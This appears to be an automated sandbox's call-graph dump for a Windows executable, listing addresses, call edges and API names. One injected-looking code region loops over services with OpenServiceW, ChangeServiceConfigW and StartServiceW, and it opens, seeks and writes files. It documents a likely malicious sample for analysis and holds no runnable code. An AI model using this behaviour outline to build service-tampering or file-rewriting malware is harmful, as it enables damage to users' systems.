430e7c 110253->110255 110257 4315cb 110254->110257 110262 430ecd 110254->110262 110256 428af4 __write 58 API calls 110255->110256 110259 428af4 __write 58 API calls 110257->110259 110322 430bb2 110321->110322 110326 430bc7 110321->110326 110323 428b28 __ftell_nolock 58 API calls 110322->110323 110327 430bfc 110326->110327 110328 435fe4 __getbuf 58 API calls 110326->110328 110332 430bc2 110326->110332 110328->110327 110332->110247 110341->110249 110342->110237 110343->110247 110344->110249 110348 42520a GetSystemTimeAsFileTime 110345->110348 110347 468f6e 110347->110093 110349 425238 __aulldiv 110348->110349 110349->110347 110499 407c5f __NMSG_WRITE 110498->110499 110500 408029 59 API calls 110499->110500 110501 407c70 _memmove 110499->110501 110502 43ed07 _memmove 110500->110502 110501->110037 110542 407a16 110504->110542 110506 40646a 110549 40750f 59 API calls 2 library calls 110506->110549 110508 406484 Mailbox 110508->109279 110511 40750f 59 API calls 110523 406265 110511->110523 110512 43dff6 110552 45f8aa 91 API calls 4 library calls 110512->110552 110516 43e004 110553 40750f 59 API calls 2 library calls 110516->110553 110517 407d8c 59 API calls 110517->110523 110519 43e01a 110519->110508 110520 406799 _memmove 110554 45f8aa 91 API calls 4 library calls 110520->110554 110521 43df92 110522 408029 59 API calls 110521->110522 110524 43df9d 110522->110524 110523->110506 110523->110511 110523->110512 110523->110517 110523->110520 110523->110521 110526 407e4f 59 API calls 110523->110526 110547 405f6c 60 API calls 110523->110547 110548 405d41 59 API calls Mailbox 110523->110548 110550 405e72 60 API calls 110523->110550 110551 407924 59 API calls 2 library calls 110523->110551 110528 420db6 Mailbox 59 API calls 110524->110528 110527 40643b CharUpperBuffW 110526->110527 110527->110523 110528->110520 110530 43f7d6 110529->110530 110531 409aa8 110529->110531 110532 407bcc 59 API calls 110530->110532 110534 43f7e7 110530->110534 110536 420db6 Mailbox 59 API calls 110531->110536 110532->110534 110533 407d8c 59 API calls 110535 43f7f1 110533->110535 110534->110533 110539 409ad4 110535->110539 110540 407667 59 API calls 110535->110540 110537 409abb 110536->110537 110537->110535 110538 409ac6 110537->110538 110538->110539 110541 407de1 59 API calls 110538->110541 110539->109283 110540->110539 110541->110539 110543 420db6 Mailbox 59 API calls 110542->110543 110544 407a3b 110543->110544 110545 408029 59 API calls 110544->110545 110546 407a4a 110545->110546 110546->110523 110547->110523 110548->110523 110549->110508 110550->110523 110551->110523 110552->110516 110553->110519 110554->110508 110555->109293 110556->109290 110557->109304 110558->109303 110559->109308 110560->109317 110561->109319 110562->109323 110563->109033 110564->109030 110565->108920 110566->108920 110567->108915 110568->108919 110569->108923 110570->108919 110571->108942 110572 1677b22 110573 1677b2b 110572->110573 110576 1675f10 110572->110576 110574 1676084 SetFilePointerEx 110574->110576 110575 1675d90 110576->110574 110576->110575 110577 401066 110582 40f76f 110577->110582 110579 40106c 110580 422d40 __cinit 67 API calls 110579->110580 110581 401076 110580->110581 110583 40f790 110582->110583 110615 41ff03 110583->110615 110587 40f7d7 110588 407667 59 API calls 110587->110588 110589 40f7e1 110588->110589 110590 407667 59 API calls 110589->110590 110591 40f7eb 110590->110591 110592 407667 59 API calls 110591->110592 110593 40f7f5 110592->110593 110594 407667 59 API calls 110593->110594 110595 40f833 110594->110595 110596 407667 59 API calls 110595->110596 110597 40f8fe 110596->110597 110625 415f87 110597->110625 110601 40f930 110602 407667 59 API calls 110601->110602 110603 40f93a 110602->110603 110653 41fd9e 110603->110653 110605 40f981 110606 40f991 GetStdHandle 110605->110606 110607 40f9dd 110606->110607 110608 4445ab 110606->110608 110609 40f9e5 OleInitialize 110607->110609 110608->110607 110610 4445b4 110608->110610 110609->110579 110660 466b38 64 API calls Mailbox 110610->110660 110612 4445bb 110661 467207 CreateThread 110612->110661 110614 4445c7 CloseHandle 110614->110609 110662 41ffdc 110615->110662 110618 41ffdc 59 API calls 110619 41ff45 110618->110619 110620 407667 59 API calls 110619->110620 110621 41ff51 110620->110621 110622 407bcc 59 API calls 110621->110622 110623 40f796 110622->110623 110624 420162 6 API calls 110623->110624 110624->110587 110626 407667 59 API calls 110625->110626 110627 415f97 110626->110627 110628 407667 59 API calls 110627->110628 110629 415f9f 110628->110629 110669 415a9d 110629->110669 110632 415a9d 59 API calls 110633 415faf 110632->110633 110634 407667 59 API calls 110633->110634 110635 415fba 110634->110635 110636 420db6 Mailbox 59 API calls 110635->110636 110637 40f908 110636->110637 110638 4160f9 110637->110638 110639 416107 110638->110639 110640 407667 59 API calls 110639->110640 110641 416112 110640->110641 110642 407667 59 API calls 110641->110642 110643 41611d 110642->110643 110644 407667 59 API calls 110643->110644 110645 416128 110644->110645 110646 407667 59 API calls 110645->110646 110647 416133 110646->110647 110648 415a9d 59 API calls 110647->110648 110649 41613e 110648->110649 110650 420db6 Mailbox 59 API calls 110649->110650 110651 416145 RegisterWindowMessageW 110650->110651 110651->110601 110654 45576f 110653->110654 110655 41fdae 110653->110655 110672 469ae7 60 API calls 110654->110672 110657 420db6 Mailbox 59 API calls 110655->110657 110659 41fdb6 110657->110659 110658 45577a 110659->110605 110660->110612 110661->110614 110673 4671ed 65 API calls 110661->110673 110663 407667 59 API calls 110662->110663 110664 41ffe7 110663->110664 110665 407667 59 API calls 110664->110665 110666 41ffef 110665->110666 110667 407667 59 API calls 110666->110667 110668 41ff3b 110667->110668 110668->110618 110670 407667 59 API calls 110669->110670 110671 415aa5 110670->110671 110671->110632 110672->110658 110674 167b180 110683 167b0de 110674->110683 110675 167b2a7 SetFilePointerEx 110676 167b1df 110675->110676 110681 167b1c6 110675->110681 110677 167b196 110678 167b3a6 110677->110678 110677->110681 110679 167b3b2 110678->110679 110680 167b328 SetFilePointerEx 110678->110680 110681->110676 110682 167b2e0 WriteFile 110681->110682 110683->110674 110683->110675 110683->110677 110683->110680 110684 167b0d0 SetFilePointerEx 110683->110684 110685 167b253 110683->110685 110684->110683 110686 167b054 110684->110686 110687 40552a 110694 405ab8 110687->110694 110693 40555a Mailbox 110695 420db6 Mailbox 59 API calls 110694->110695 110696 405acb 110695->110696 110697 420db6 Mailbox 59 API calls 110696->110697 110698 40553c 110697->110698 110699 4054d2 110698->110699 110713 4058cf 110699->110713 110701 405514 110701->110693 110705 408061 MultiByteToWideChar 110701->110705 110703 4054e3 110703->110701 110720 405bc0 110703->110720 110726 405a7a 110703->110726 110706 408087 110705->110706 110707 4080ce 110705->110707 110709 420db6 Mailbox 59 API calls 110706->110709 110708 407d8c 59 API calls 110707->110708 110712 4080c0 110708->110712 110710 40809c MultiByteToWideChar 110709->110710 110743 40774d 59 API calls 2 library calls 110710->110743 110712->110693 110714 4058e0 110713->110714 110715 43dc3c 110713->110715 110714->110703 110735 455ecd 59 API calls Mailbox 110715->110735 110717 43dc46 110718 420db6 Mailbox 59 API calls 110717->110718 110719 43dc52 110718->110719 110721 405c33 110720->110721 110722 405bce 110720->110722 110736 405c4e SetFilePointerEx 110721->110736 110723 405bf6 110722->110723 110725 405c06 ReadFile 110722->110725 110723->110703 110725->110722 110725->110723 110727 43dcee 110726->110727 110728 405a8e 110726->110728 110742 455ecd 59 API calls Mailbox 110727->110742 110737 4059b9 110728->110737 110731 405a9a 110731->110703 110732 43dcf9 110733 420db6 Mailbox 59 API calls 110732->110733 110734 43dd0e _memmove 110733->110734 110735->110717 110736->110722 110738 4059d1 110737->110738 110741 4059ca _memmove 110737->110741 110739 43dc7e 110738->110739 110740 420db6 Mailbox 59 API calls 110738->110740 110740->110741 110741->110731 110742->110732 110743->110712 110744 167520c 110747 169cbd0 110744->110747 110746 1675211 110757 169be50 _wcslen 110747->110757 110748 169c168 110786 169a905 LocalFree 110748->110786 110751 169c78e CloseServiceHandle 110751->110757 110752 169bffd StrStrIW 110752->110757 110753 169c706 StrStrIW 110753->110757 110755 169bf68 StrStrIW 110755->110757 110756 169c72b StrStrIW 110756->110757 110757->110746 110757->110747 110757->110748 110757->110751 110757->110752 110757->110753 110757->110755 110757->110756 110758 169c0fd CloseServiceHandle 110757->110758 110759 169bfe9 110757->110759 110760 169c399 StrStrIW 110757->110760 110761 169bf7e 110757->110761 110764 169c7e4 StartServiceW 110757->110764 110766 169c65a ChangeServiceConfigW 110757->110766 110767 167ce90 110757->110767 110785 169a350 CloseServiceHandle 110757->110785 110787 1675d20 110757->110787 110758->110757 110759->110746 110760->110757 110763 169c3a9 110760->110763 110761->110764 110765 169c36b OpenServiceW 110761->110765 110763->110746 110764->110757 110765->110757 110766->110757 110766->110759 110778 167cc9b _wcslen 110767->110778 110768 1675d20 VirtualAlloc VirtualFree 110768->110778 110769 167d5c5 CreateFileW 110769->110778 110770 167d729 GetFileSizeEx 110771 167d8a1 CloseHandle 110770->110771 110770->110778 110771->110778 110772 167d42a CloseHandle 110772->110778 110774 167cd5c lstrcmpiW 110774->110778 110775 167cca0 lstrcmpiW 110775->110778 110776 167d049 SetFilePointerEx 110776->110778 110778->110757 110778->110767 110778->110768 110778->110769 110778->110770 110778->110771 110778->110772 110778->110774 110778->110775 110778->110776 110779 167d378 CloseHandle 110778->110779 110780 167d426 110778->110780 110781 167cfbb GetFileTime 110778->110781 110782 167cc92 110778->110782 110784 167d903 110778->110784 110792 1678937 VirtualAlloc VirtualFree 110778->110792 110793 1678470 VirtualAlloc VirtualFree 110778->110793 110779->110778 110780->110771 110780->110772 110781->110778 110782->110757 110783 16afdfc 40 API calls 110783->110784 110784->110782 110784->110783 110785->110757 110786->110759 110788 1675d22 110787->110788 110788->110757 110789 1675d39 VirtualAlloc 110788->110789 110791 1675d46 VirtualFree 110788->110791 110789->110788 110791->110757 110792->110778 110794 40e5ab 110797 40d100 110794->110797 110796 40e5b9 110798 40d11d 110797->110798 110815 40d37d 110797->110815 110799 4426e0 110798->110799 110800 442691 110798->110800 110821 40d144 110798->110821 110841 47a3e6 341 API calls __cinit 110799->110841 110802 442694 110800->110802 110811 4426af 110800->110811 110804 4426a0 110802->110804 110802->110821 110839 47a9fa 341 API calls 110804->110839 110805 422d40 __cinit 67 API calls 110805->110821 110808 40d434 110833 408a52 68 API calls 110808->110833 110809 4428b5 110809->110809 110810 40d54b 110810->110796 110811->110815 110840 47aea2 341 API calls 3 library calls 110811->110840 110815->110810 110846 469e4a 89 API calls 4 library calls 110815->110846 110816 4427fc 110845 47a751 89 API calls 110816->110845 110817 40d443 110817->110796 110820 4084c0 69 API calls 110820->110821 110821->110805 110821->110808 110821->110810 110821->110815 110821->110816 110821->110820 110828 409ea0 341 API calls 110821->110828 110829 408047 59 API calls 110821->110829 110831 408740 68 API calls __cinit 110821->110831 110832 408542 68 API calls 110821->110832 110834 40843a 68 API calls 110821->110834 110835 40cf7c 341 API calls 110821->110835 110836 409dda 59 API calls Mailbox 110821->110836 110837 40cf00 89 API calls 110821->110837 110838 40cd7d 341 API calls 110821->110838 110842 408a52 68 API calls 110821->110842 110843 409d3c 60 API calls Mailbox 110821->110843 110844 45678d 60 API calls 110821->110844 110828->110821 110829->110821 110831->110821 110832->110821 110833->110817 110834->110821 110835->110821 110836->110821 110837->110821 110838->110821 110839->110810 110840->110815 110841->110821 110842->110821 110843->110821 110844->110821 110845->110815 110846->110809 110847 40e48c 110850 40ccba 110847->110850 110849 40e498 110851 40ccd2 110850->110851 110852 40cd26 110850->110852 110851->110852 110853 409ea0 341 API calls 110851->110853 110856 40cd4f 110852->110856 110860 469e4a 89 API calls 4 library calls 110852->110860 110857 40cd09 110853->110857 110855 4425bc 110855->110855 110856->110849 110857->110856 110859 409d3c 60 API calls Mailbox 110857->110859 110859->110852 110860->110855 110861 40b40e 110862 41f944 60 API calls 110861->110862 110863 40b424 110862->110863 110869 40c5a7 110863->110869 110865 40b44c 110866 40a388 110865->110866 110881 469e4a 89 API calls 4 library calls 110865->110881 110868 4408e9 110870 407a16 59 API calls 110869->110870 110871 40c5cc _wcscmp 110870->110871 110872 407de1 59 API calls 110871->110872 110875 40c600 Mailbox 110871->110875 110873 441691 110872->110873 110874 407b2e 59 API calls 110873->110874 110876 44169c 110874->110876 110875->110865 110882 40843a 68 API calls 110876->110882 110878 4416ad 110880 4416b1 Mailbox 110878->110880 110883 409d3c 60 API calls Mailbox 110878->110883 110880->110865 110881->110868 110882->110878 110883->110880 110884 b65378 110898 b62fc8 110884->110898 110886 b6544c 110901 b65268 110886->110901 110900 b63653 110898->110900 110904 b66478 GetPEB 110898->110904 110900->110886 110902 b65271 Sleep 110901->110902 110903 b6527f 110902->110903 110904->110900 110905 403633 110906 40366a 110905->110906 110907 4036e7 110906->110907 110908 403688 110906->110908 110946 4036e5 110906->110946 110912 4036ed 110907->110912 110913 43d0cc 110907->110913 110909 403695 110908->110909 110910 40374b PostQuitMessage 110908->110910 110917 4036a0 110909->110917 110918 43d154 110909->110918 110919 4036d8 110910->110919 110911 4036ca DefWindowProcW 110911->110919 110914 4036f2 110912->110914 110915 403715 SetTimer RegisterWindowMessageW 110912->110915 110954 411070 10 API calls Mailbox 110913->110954 110920 4036f9 KillTimer 110914->110920 110921 43d06f 110914->110921 110915->110919 110923 40373e CreatePopupMenu 110915->110923 110924 403755 110917->110924 110925 4036a8 110917->110925 110970 462527 71 API calls _memset 110918->110970 110950 40443a Shell_NotifyIconW _memset 110920->110950 110933 43d074 110921->110933 110934 43d0a8 MoveWindow 110921->110934 110922 43d0f3 110955 411093 341 API calls Mailbox 110922->110955 110923->110919 110952 4044a0 64 API calls _memset 110924->110952 110929 4036b3 110925->110929 110930 43d139 110925->110930 110936 4036be 110929->110936 110937 43d124 110929->110937 110930->110911 110969 457c36 59 API calls Mailbox 110930->110969 110931 43d166 110931->110911 110931->110919 110939 43d097 SetFocus 110933->110939 110940 43d078 110933->110940 110934->110919 110935 40370c 110951 403114 DeleteObject DestroyWindow Mailbox 110935->110951 110936->110911 110956 40443a Shell_NotifyIconW _memset 110936->110956 110968 462d36 81 API calls _memset 110937->110968 110938 403764 110938->110919 110939->110919 110940->110936 110944 43d081 110940->110944 110953 411070 10 API calls Mailbox 110944->110953 110946->110911 110948 43d118 110957 40434a 110948->110957 110950->110935 110951->110919 110952->110938 110953->110919 110954->110922 110955->110936 110956->110948 110958 404375 _memset 110957->110958 110971 404182 110958->110971 110961 4043fa 110963 404430 Shell_NotifyIconW 110961->110963 110964 404414 Shell_NotifyIconW 110961->110964 110965 404422 110963->110965 110964->110965 110975 40407c 110965->110975 110967 404429 110967->110946 110968->110938 110969->110946 110970->110931 110972 43d423 110971->110972 110973 404196 110971->110973 110972->110973 110974 43d42c DestroyIcon 110972->110974 110973->110961 110997 462f94 62 API calls _W_store_winword 110973->110997 110974->110973 110976 404098 110975->110976 110977 40416f Mailbox 110975->110977 110978 407a16 59 API calls 110976->110978 110977->110967 110979 4040a6 110978->110979 110980 4040b3 110979->110980 110981 43d3c8 LoadStringW 110979->110981 110982 407bcc 59 API calls 110980->110982 110984 43d3e2 110981->110984 110983 4040c8 110982->110983 110983->110984 110985 4040d9 110983->110985 110986 407b2e 59 API calls 110984->110986 110987 4040e3 110985->110987 110988 404174 110985->110988 110991 43d3ec 110986->110991 110990 407b2e 59 API calls 110987->110990 110989 408047 59 API calls 110988->110989 110994 4040ed _memset _wcscpy 110989->110994 110990->110994 110992 407cab 59 API calls 110991->110992 110991->110994 110993 43d40e 110992->110993 110996 407cab 59 API calls 110993->110996 110995 404155 Shell_NotifyIconW 110994->110995 110995->110977 110996->110994 110997->110961 110998 427c56 110999 427c62 110998->110999 111035 429e08 GetStartupInfoW 110999->111035 111002 427cbf 111004 427cca 111002->111004 111120 427da6 58 API calls 3 library calls 111002->111120 111003 427c67 111037 428b7c GetProcessHeap 111003->111037 111038 429ae6 111004->111038 111007 427cd0 111008 427cdb __RTC_Initialize 111007->111008 111121 427da6 58 API calls 3 library calls 111007->111121 111059 42d5d2 111008->111059 111011 427cea 111012 427cf6 GetCommandLineW 111011->111012 111122 427da6 58 API calls 3 library calls 111011->111122 111078 434f23 GetEnvironmentStringsW 111012->111078 111015 427cf5 111015->111012 111018 427d10 111019 427d1b 111018->111019 111123 4230b5 58 API calls 3 library calls 111018->111123 111088 434d58 111019->111088 111022 427d21 111023 427d2c 111022->111023 111124 4230b5 58 API calls 3 library calls 111022->111124 111102 4230ef 111023->111102 111026 427d34 111027 427d3f __wwincmdln 111026->111027 111125 4230b5 58 API calls 3 library calls 111026->111125 111108 4047d0 111027->111108 111030 427d53 111031 427d62 111030->111031 111126 423358 58 API calls _doexit 111030->111126 111127 4230e0 58 API calls _doexit 111031->111127 111034 427d67 __write 111036 429e1e 111035->111036 111036->111003 111037->111002 111128 423187 36 API calls 2 library calls 111038->111128 111040 429aeb 111129 429d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 111040->111129 111042 429af0 111043 429af4 111042->111043 111131 429d8a TlsAlloc 111042->111131 111130 429b5c 61 API calls 2 library calls 111043->111130 111046 429af9 111046->111007 111047 429b06 111047->111043 111048 429b11 111047->111048 111132 4287d5 111048->111132 111051 429b53 111140 429b5c 61 API calls 2 library calls 111051->111140 111054 429b58 111054->111007 111055 429b32 111055->111051 111056 429b38 111055->111056 111139 429a33 58 API calls 4 library calls 111056->111139 111058 429b40 GetCurrentThreadId 111058->111007 111060 42d5de __write 111059->111060 111061 429c0b __lock 58 API calls 111060->111061 111062 42d5e5 111061->111062 111063 4287d5 __calloc_crt 58 API calls 111062->111063 111064 42d5f6 111063->111064 111065 42d661 GetStartupInfoW 111064->111065 111066 42d601 __write @_EH4_CallFilterFunc@8 111064->111066 111067 42d676 111065->111067 111068 42d7a5 111065->111068 111066->111011 111067->111068 111071 4287d5 __calloc_crt 58 API calls 111067->111071 111074 42d6c4 111067->111074 111069 42d86d 111068->111069 111072 42d7f2 GetStdHandle 111068->111072 111073 42d805 GetFileType 111068->111073 111153 429e2b InitializeCriticalSectionAndSpinCount 111068->111153 111154 42d87d LeaveCriticalSection _doexit 111069->111154 111071->111067 111072->111068 111073->111068 111074->111068 111075 42d6f8 GetFileType 111074->111075 111152 429e2b InitializeCriticalSectionAndSpinCount 111074->111152 111075->111074 111079 427d06 111078->111079 111080 434f34 111078->111080 111084 434b1b GetModuleFileNameW 111079->111084 111155 42881d 58 API calls 2 library calls 111080->111155 111082 434f5a _memmove 111083 434f70 FreeEnvironmentStringsW 111082->111083 111083->111079 111085 434b4f _wparse_cmdline 111084->111085 111087 434b8f _wparse_cmdline 111085->111087 111156 42881d 58 API calls 2 library calls 111085->111156 111087->111018 111089 434d71 __NMSG_WRITE 111088->111089 111093 434d69 111088->111093 111090 4287d5 __calloc_crt 58 API calls 111089->111090 111098 434d9a __NMSG_WRITE 111090->111098 111091 434df1 111092 422d55 _free 58 API calls 111091->111092 111092->111093 111093->111022 111094 4287d5 __calloc_crt 58 API calls 111094->111098 111095 434e16 111096 422d55 _free 58 API calls 111095->111096 111096->111093 111098->111091 111098->111093 111098->111094 111098->111095 111099 434e2d 111098->111099 111157 434607 58 API calls __ftell_nolock 111098->111157 111158 428dc6 IsProcessorFeaturePresent 111099->111158 111101 434e39 111101->111022 111103 4230fb __IsNonwritableInCurrentImage 111102->111103 111173 42a4d1 111103->111173 111105 423119 __initterm_e 111106 422d40 __cinit 67 API calls 111105->111106 111107 423138 _doexit __IsNonwritableInCurrentImage 111105->111107 111106->111107 111107->111026 111109 4047ea 111108->111109 111119 404889 111108->111119 111110 404824 IsThemeActive 111109->111110 111176 42336c 111110->111176 111114 404850 111188 4048fd SystemParametersInfoW SystemParametersInfoW 111114->111188 111116 40485c 111189 403b3a 111116->111189 111119->111030 111120->111004 111121->111008 111122->111015 111126->111031 111127->111034 111128->111040 111129->111042 111130->111046 111131->111047 111133 4287dc 111132->111133 111135 428817 111133->111135 111137 4287fa 111133->111137 111141 4351f6 111133->111141 111135->111051 111138 429de6 TlsSetValue 111135->111138 111137->111133 111137->111135 111149 42a132 Sleep 111137->111149 111138->111055 111139->111058 111140->111054 111142 435201 111141->111142 111144 43521c 111141->111144 111143 43520d 111142->111143 111142->111144 111150 428b28 58 API calls __getptd_noexit 111143->111150 111145 43522c HeapAlloc 111144->111145 111147 435212 111144->111147 111151 4233a1 DecodePointer 111144->111151 111145->111144 111145->111147 111147->111133 111149->111137 111150->111147 111151->111144 111152->111074 111153->111068 111154->111066 111155->111082 111156->111087 111157->111098 111159 428dd1 111158->111159 111164 428c59 111159->111164 111163 428dec 111163->111101 111165 428c73 _memset __call_reportfault 111164->111165 111166 428c93 IsDebuggerPresent 111165->111166 111172 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 111166->111172 111168 42c5f6 __ftell_nolock 6 API calls 111170 428d7a 111168->111170 111169 428d57 __call_reportfault 111169->111168 111171 42a140 GetCurrentProcess TerminateProcess 111170->111171 111171->111163 111172->111169 111174 42a4d4 EncodePointer 111173->111174 111174->111174 111175 42a4ee 111174->111175 111175->111105 111177 429c0b __lock 58 API calls 111176->111177 111178 423377 DecodePointer EncodePointer 111177->111178 111241 429d75 LeaveCriticalSection 111178->111241 111180 404849 111181 4233d4 111180->111181 111182 4233f8 111181->111182 111183 4233de 111181->111183 111182->111114 111183->111182 111242 428b28 58 API calls __getptd_noexit 111183->111242 111185 4233e8 111243 428db6 9 API calls __ftell_nolock 111185->111243 111187 4233f3 111187->111114 111188->111116 111190 403b47 __ftell_nolock 111189->111190 111191 407667 59 API calls 111190->111191 111192 403b51 GetCurrentDirectoryW 111191->111192 111244 403766 111192->111244 111241->111180 111242->111185 111243->111187 111245 407667 59 API calls 111244->111245 111246 40377c 111245->111246 111375 403d31 111246->111375 111248 40379a 111249 404706 61 API calls 111248->111249 111250 4037ae 111249->111250 111251 407de1 59 API calls 111250->111251 111252 4037bb 111251->111252 111253 404ddd 136 API calls 111252->111253 111376 403d3e __ftell_nolock 111375->111376 111377 407bcc 59 API calls 111376->111377 111382 403ea4 Mailbox 111376->111382 111379 403d70 111377->111379 111378 4079f2 59 API calls 111378->111379 111379->111378 111387 403da6 Mailbox 111379->111387 111380 4079f2 59 API calls 111380->111387 111381 403e77 111381->111382 111383 407de1 59 API calls 111381->111383 111382->111248 111385 403e98 111383->111385 111384 407de1 59 API calls 111384->111387 111386 403f74 59 API calls 111385->111386 111386->111382 111387->111380 111387->111381 111387->111382 111387->111384 111442 403f74 111387->111442 111443 403f82 111442->111443 111447 403fa4 _memmove 111442->111447 111446 420db6 Mailbox 59 API calls 111443->111446 111444 420db6 Mailbox 59 API calls 111445 403fb8 111444->111445 111445->111387 111446->111447 111447->111444 111731 401055 111736 402649 111731->111736 111734 422d40 __cinit 67 API calls 111735 401064 111734->111735 111737 407667 59 API calls 111736->111737 111738 4026b7 111737->111738 111743 403582 111738->111743 111741 402754 111742 40105a 111741->111742 111746 403416 59 API calls 2 library calls 111741->111746 111742->111734 111747 4035b0 111743->111747 111746->111741 111748 4035bd 111747->111748 111749 4035a1 111747->111749 111748->111749 111750 4035c4 RegOpenKeyExW 111748->111750 111749->111741 111750->111749 111751 4035de RegQueryValueExW 111750->111751 111752 403614 RegCloseKey 111751->111752 111753 4035ff 111751->111753 111752->111749 111753->111752 111754 401016 111759 404974 111754->111759 111757 422d40 __cinit 67 API calls 111758 401025 111757->111758 111760 420db6 Mailbox 59 API calls 111759->111760 111761 40497c 111760->111761 111762 40101b 111761->111762 111766 404936 111761->111766 111762->111757 111767 404951 111766->111767 111768 40493f 111766->111768 111770 4049a0 111767->111770 111769 422d40 __cinit 67 API calls 111768->111769 111769->111767 111771 407667 59 API calls 111770->111771 111772 4049b8 GetVersionExW 111771->111772 111773 407bcc 59 API calls 111772->111773 111774 4049fb 111773->111774 111775 407d2c 59 API calls 111774->111775 111778 404a28 111774->111778 111776 404a1c 111775->111776 111777 407726 59 API calls 111776->111777 111777->111778 111779 404a93 GetCurrentProcess IsWow64Process 111778->111779 111781 43d864 111778->111781 111780 404aac 111779->111780 111782 404ac2 111780->111782 111783 404b2b GetSystemInfo 111780->111783 111794 404b37 111782->111794 111784 404af8 111783->111784 111784->111762 111787 404ad4 111790 404b37 2 API calls 111787->111790 111788 404b1f GetSystemInfo 111789 404ae9 111788->111789 111789->111784 111791 404aef FreeLibrary 111789->111791 111792 404adc GetNativeSystemInfo 111790->111792 111791->111784 111792->111789 111795 404ad0 111794->111795 111796 404b40 LoadLibraryA 111794->111796 111795->111787 111795->111788 111796->111795 111797 404b51 GetProcAddress 111796->111797 111797->111795 111798 167aaf0 111799 167ab06 111798->111799 111803 167ab57 111799->111803 111804 1676490 111799->111804 111806 1675f10 111804->111806 111807 1675d90 111804->111807 111805 1676084 SetFilePointerEx 111805->111806 111806->111805 111806->111807 111808 16afaf0 111807->111808 111809 16afafd 111808->111809 111813 16afb84 111808->111813 111811 16afb2a 111809->111811 111809->111813 111815 16b032f 111811->111815 111827 16b1a1b 21 API calls 2 library calls 111811->111827 111812 16b08d6 111812->111803 111814 16afc05 111813->111814 111823 16afbda 111813->111823 111820 16afc38 111814->111820 111826 16b0fe0 21 API calls __startOneArgErrorHandling 111814->111826 111815->111803 111817 16afc22 111817->111803 111818 16b116e 111829 16b0fe0 21 API calls __startOneArgErrorHandling 111818->111829 111819 16b1167 111828 16b0ff7 21 API calls __startOneArgErrorHandling 111819->111828 111820->111803 111823->111818 111823->111819 111823->111820 111824 16b116c 111824->111803 111825 16b1173 111825->111803 111826->111817 111827->111812 111828->111824 111829->111825 111830 401078 111835 40708b 111830->111835 111832 40108c 111833 422d40 __cinit 67 API calls 111832->111833 111834 401096 111833->111834 111836 40709b __ftell_nolock 111835->111836 111837 407667 59 API calls 111836->111837 111838 407151 111837->111838 111839 404706 61 API calls 111838->111839 111840 40715a 111839->111840 111866 42050b 111840->111866 111843 407cab 59 API calls 111844 407173 111843->111844 111845 403f74 59 API calls 111844->111845 111846 407182 111845->111846 111847 407667 59 API calls 111846->111847 111848 40718b 111847->111848 111849 407d8c 59 API calls 111848->111849 111850 407194 RegOpenKeyExW 111849->111850 111851 43e8b1 RegQueryValueExW 111850->111851 111855 4071b6 Mailbox 111850->111855 111852 43e943 RegCloseKey 111851->111852 111853 43e8ce 111851->111853 111852->111855 111865 43e955 _wcscat Mailbox __NMSG_WRITE 111852->111865 111854 420db6 Mailbox 59 API calls 111853->111854 111856 43e8e7 111854->111856 111855->111832 111857 40522e 59 API calls 111856->111857 111859 43e8f2 RegQueryValueExW 111857->111859 111858 4079f2 59 API calls 111858->111865 111860 43e90f 111859->111860 111862 43e929 111859->111862 111861 407bcc 59 API calls 111860->111861 111861->111862 111862->111852 111863 407de1 59 API calls 111863->111865 111864 403f74 59 API calls 111864->111865 111865->111855 111865->111858 111865->111863 111865->111864 111867 431940 __ftell_nolock 111866->111867 111868 420518 GetFullPathNameW 111867->111868 111869 42053a 111868->111869 111870 407bcc 59 API calls 111869->111870 111871 407165 111870->111871 111871->111843 111872 1675a3b 111873 1675a45 111872->111873 111878 1674f7c 111872->111878 111874 16751ae 111873->111874 111875 1675a4b CreateThread 111873->111875 111877 1675a59 RtlExitUserThread 111875->111877 111876 1674f88 111882 1675b1d 111877->111882 111878->111876 111880 1675d20 2 API calls 111878->111880 111881 1674f99 111880->111881 111883 1675d20 2 API calls 111882->111883 111884 1675b3c 111883->111884 111885 43fdfc 111890 40ab30 Mailbox _memmove 111885->111890 111887 45617e Mailbox 59 API calls 111909 40a057 111887->111909 111889 420db6 59 API calls Mailbox 111889->111890 111890->111889 111892 40b525 111890->111892 111890->111909 111911 407de1 59 API calls 111890->111911 111915 409f37 Mailbox 111890->111915 111917 47bc6b 341 API calls 111890->111917 111919 40b2b6 111890->111919 111921 409ea0 341 API calls 111890->111921 111922 44086a 111890->111922 111924 440878 111890->111924 111926 44085c 111890->111926 111927 40b21c 111890->111927 111930 456e8f 59 API calls 111890->111930 111933 468715 61 API calls 111890->111933 111937 47445a 341 API calls 111890->111937 111938 46d07b 111890->111938 111985 411fc3 111890->111985 112025 482141 111890->112025 112063 47df23 111890->112063 112066 47c2e0 111890->112066 112098 467956 111890->112098 112104 45617e 111890->112104 112109 409c90 59 API calls Mailbox 111890->112109 112113 47c193 85 API calls 2 library calls 111890->112113 112115 469e4a 89 API calls 4 library calls 111892->112115 111894 4409e5 112120 469e4a 89 API calls 4 library calls 111894->112120 111895 440055 112114 469e4a 89 API calls 4 library calls 111895->112114 111898 40b475 111904 408047 59 API calls 111898->111904 111900 40b47a 111900->111894 111900->111895 111901 420db6 59 API calls Mailbox 111901->111915 111902 440064 111904->111909 111907 408047 59 API calls 111907->111915 111908 407667 59 API calls 111908->111915 111910 422d40 67 API calls __cinit 111910->111915 111911->111890 111912 456e8f 59 API calls 111912->111915 111913 4409d6 112119 469e4a 89 API calls 4 library calls 111913->112119 111915->111895 111915->111898 111915->111900 111915->111901 111915->111907 111915->111908 111915->111909 111915->111910 111915->111912 111915->111913 111916 40a55a 111915->111916 112107 40c8c0 341 API calls 2 library calls 111915->112107 112108 40b900 60 API calls Mailbox 111915->112108 112118 469e4a 89 API calls 4 library calls 111916->112118 111917->111890 112112 40f6a3 341 API calls 111919->112112 111921->111890 112116 409c90 59 API calls Mailbox 111922->112116 112117 469e4a 89 API calls 4 library calls 111924->112117 111926->111887 111926->111909 112110 409d3c 60 API calls Mailbox 111927->112110 111929 40b22d 112111 409d3c 60 API calls Mailbox 111929->112111 111930->111890 111933->111890 111937->111890 111939 46d09a 111938->111939 111940 46d0a5 111938->111940 112121 409b3c 59 API calls 111939->112121 111943 407667 59 API calls 111940->111943 111983 46d17f Mailbox 111940->111983 111942 420db6 Mailbox 59 API calls 111944 46d1c8 111942->111944 111945 46d0c9 111943->111945 111946 46d1d4 111944->111946 112124 4057a6 60 API calls Mailbox 111944->112124 111947 407667 59 API calls 111945->111947 111949 409837 84 API calls 111946->111949 111950 46d0d2 111947->111950 111951 46d1ec 111949->111951 111952 409837 84 API calls 